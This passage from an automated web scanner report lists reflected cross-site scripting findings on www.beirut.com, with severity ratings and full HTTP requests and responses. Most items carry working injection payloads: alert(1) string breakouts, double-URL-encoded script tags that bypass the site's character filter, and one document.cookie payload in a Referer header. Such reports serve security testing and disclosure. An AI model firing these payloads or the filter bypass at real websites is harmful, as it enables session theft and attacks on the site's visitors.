Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:43:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Hotels/4-Stars6c1ea'-alert(1)-'18dc956b014';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.537. http://www.beirut.com/Hotels/4-Stars/4 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Hotels/4-Stars/4

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f45f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e0d15868f5 was submitted in the REST URL parameter 3. This input was echoed as f45f3"><script>alert(1)</script>9e0d15868f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /Hotels/4-Stars/4f45f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e0d15868f5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:47:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=orange&indexpage=Hotels&listingtype=locales.php&Types=4f45f3"><script>alert(1)</script>9e0d15868f5">
...[SNIP]...

4.538. http://www.beirut.com/Hotels/5-Stars/5 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Hotels/5-Stars/5

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2de3c"><a>335baf5011d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Hotels2de3c"><a>335baf5011d/5-Stars/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:31:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Hotels2de3c"><a>335baf5011d">
...[SNIP]...

4.539. http://www.beirut.com/Hotels/5-Stars/5 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Hotels/5-Stars/5

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3ae6'-alert(1)-'e50985d440 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Hotelsb3ae6'-alert(1)-'e50985d440/5-Stars/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:42:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Hotelsb3ae6'-alert(1)-'e50985d440/5-Stars';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.540. http://www.beirut.com/Hotels/5-Stars/5 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Hotels/5-Stars/5

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ded21'-alert(1)-'cc45cd03f80 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Hotels/5-Starsded21'-alert(1)-'cc45cd03f80/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:46:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Hotels/5-Starsded21'-alert(1)-'cc45cd03f80';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.541. http://www.beirut.com/Hotels/5-Stars/5 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Hotels/5-Stars/5

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d0a5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef43175ac564 was submitted in the REST URL parameter 3. This input was echoed as 6d0a5"><script>alert(1)</script>f43175ac564 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /Hotels/5-Stars/56d0a5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef43175ac564 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:50:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=magenta&indexpage=Hotels&listingtype=locales.php&Types=56d0a5"><script>alert(1)</script>f43175ac564">
...[SNIP]...

4.542. http://www.beirut.com/Index/Error [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Index/Error

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d47bf'-alert(1)-'efcc76bb9a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Indexd47bf'-alert(1)-'efcc76bb9a4/Error HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:42:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 61583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Indexd47bf'-alert(1)-'efcc76bb9a4';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.543. http://www.beirut.com/Index/Error [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Index/Error

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a3da"><a>340a7ec5325 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Index4a3da"><a>340a7ec5325/Error HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:41:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 61560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=blue&indexpage=Index4a3da"><a>340a7ec5325&listingtype=index.php&Types=">
...[SNIP]...

4.544. http://www.beirut.com/JustForKids/Educational/9-service [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/JustForKids/Educational/9-service

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c86e"><a>1669927877e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /JustForKids5c86e"><a>1669927877e/Educational/9-service HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:54:22 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="JustForKids5c86e"><a>1669927877e">
...[SNIP]...

4.545. http://www.beirut.com/JustForKids/Educational/9-service [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/JustForKids/Educational/9-service

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28d50'-alert(1)-'2b48b6f7343 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /JustForKids28d50'-alert(1)-'2b48b6f7343/Educational/9-service HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:03:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='JustForKids28d50'-alert(1)-'2b48b6f7343';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.546. http://www.beirut.com/JustForKids/Educational/9-service [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/JustForKids/Educational/9-service

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 426d9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7dd67e3cf0 was submitted in the REST URL parameter 3. This input was echoed as 426d9"><script>alert(1)</script>7dd67e3cf0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /JustForKids/Educational/9-service426d9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7dd67e3cf0 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:11:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=purple&indexpage=JustForKids&listingtype=justforkids.php&Types=9-service426d9"><script>alert(1)</script>7dd67e3cf0">
...[SNIP]...

4.547. http://www.beirut.com/JustForKids/Gatherings/14-event [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/JustForKids/Gatherings/14-event

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1164'-alert(1)-'8498d5bb334 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /JustForKidse1164'-alert(1)-'8498d5bb334/Gatherings/14-event HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:13:43 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='JustForKidse1164'-alert(1)-'8498d5bb334';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.548. http://www.beirut.com/JustForKids/Gatherings/14-event [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/JustForKids/Gatherings/14-event

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13a67"><a>36c4cb2e963 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /JustForKids13a67"><a>36c4cb2e963/Gatherings/14-event HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:04:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="JustForKids13a67"><a>36c4cb2e963">
...[SNIP]...

4.549. http://www.beirut.com/JustForKids/Gatherings/14-event [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/JustForKids/Gatherings/14-event

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df290%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1d5624aa6d5 was submitted in the REST URL parameter 3. This input was echoed as df290"><script>alert(1)</script>1d5624aa6d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /JustForKids/Gatherings/14-eventdf290%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1d5624aa6d5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:23:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54185

